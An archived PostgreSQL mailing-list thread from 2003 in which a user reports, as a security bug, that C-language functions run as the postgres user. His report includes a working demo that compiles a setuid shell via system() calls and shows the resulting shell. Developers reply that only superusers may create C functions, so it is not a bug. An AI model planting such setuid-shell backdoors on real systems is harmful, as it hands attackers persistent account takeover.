Обсуждение: "Bug" report - Serious (local shell)

Поиск
Список
Период
Сортировка

"Bug" report - Serious (local shell)

От
Diego Linke - GAMK
Дата:
============================================================================
                        POSTGRESQL BUG REPORT TEMPLATE
============================================================================


Your name               : Diego Linke
Your email address      : gamk@gamk.com.br

System Configuration
---------------------
  Architecture (example: Intel Pentium)         : Intel

  Operating System (example: Linux 2.0.26 ELF)  : NetBSD 1.6.1_STABLE

  PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2

  Compiler used (example:  gcc 2.95.2)          : 2.95.3 20010315

Please enter a FULL description of your problem:
------------------------------------------------

The problem is that postgresql when calls a function in external C, calls with user of the postgres.
A bad user will be able to create binary with shell suid for the user of postgres, and to assume the control of
postgres(pg_hba.conf, bases, postmaster, at last everything that the user of postgres can make). 
I presume that this problem has in all the versions of postgres. :p


See this example:

(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
  setuid(1001);
  setgid(1000);
 system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>

int execute(int x) {
  system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
  system("chmod a+x /tmp/ja_era/supg");
  system("chmod u+s /tmp/ja_era/supg");
  return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.

Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help on internal slash commands
       \g or terminate with semicolon to execute query
       \q to quit

teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
 execute
---------
       6
(1 row)
B

teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x  1 pgsql  wheel  6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r--  1 pgsql  wheel  0 Aug 14 08:42 /tmp/teste
$



--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk@gamk.com.br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464

Re: "Bug" report - Serious (local shell)

От
Stephan Szabo
Дата:
On Thu, 14 Aug 2003, Diego Linke - GAMK wrote:

> Your name               : Diego Linke
> Your email address      : gamk@gamk.com.br
>
> System Configuration
> ---------------------
>   Architecture (example: Intel Pentium)         : Intel
>
>   Operating System (example: Linux 2.0.26 ELF)  : NetBSD 1.6.1_STABLE
>
>   PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
>
>   Compiler used (example:  gcc 2.95.2)          : 2.95.3 20010315
>
> Please enter a FULL description of your problem:
> ------------------------------------------------
>

> The problem is that postgresql when calls a function in external C,
> calls with user of the postgres.
> A bad user will be able to create binary with shell suid for the user
> of postgres, and to assume the control of postgres (pg_hba.conf,
> bases, postmaster, at last everything that the user of postgres can
> make).

Only a bad database superuser should be able to do anything of the sort
because normal users shouldn't be allowed to use CREATE FUNCTION with C
language functions (it's untrusted), are you seeing something different?

Re: "Bug" report - Serious (local shell)

От
Tom Lane
Дата:
Diego Linke - GAMK <linke@calnet.com.br> writes:
> The problem is that postgresql when calls a function in external C,
> calls with user of the postgres.

The ability to create C functions is reserved to superusers, for exactly
this reason.  If you have the rights to make the backend execute
arbitrary C code, you hardly need a shell to do something nasty.

In short, this is not a bug.  Don't give superuser privileges to people
you cannot trust.

            regards, tom lane

Re: "Bug" report - Serious (local shell)

От
Diego Linke - GAMK
Дата:
Hi Stephan,

>
> Only a bad database superuser should be able to do anything of the sort
> because normal users shouldn't be allowed to use CREATE FUNCTION with C
> language functions (it's untrusted), are you seeing something different?
>

I am sorry!
I really did not perceive that only one administrator could create functions in C.

Thanks for all.


--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk@gamk.com.br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464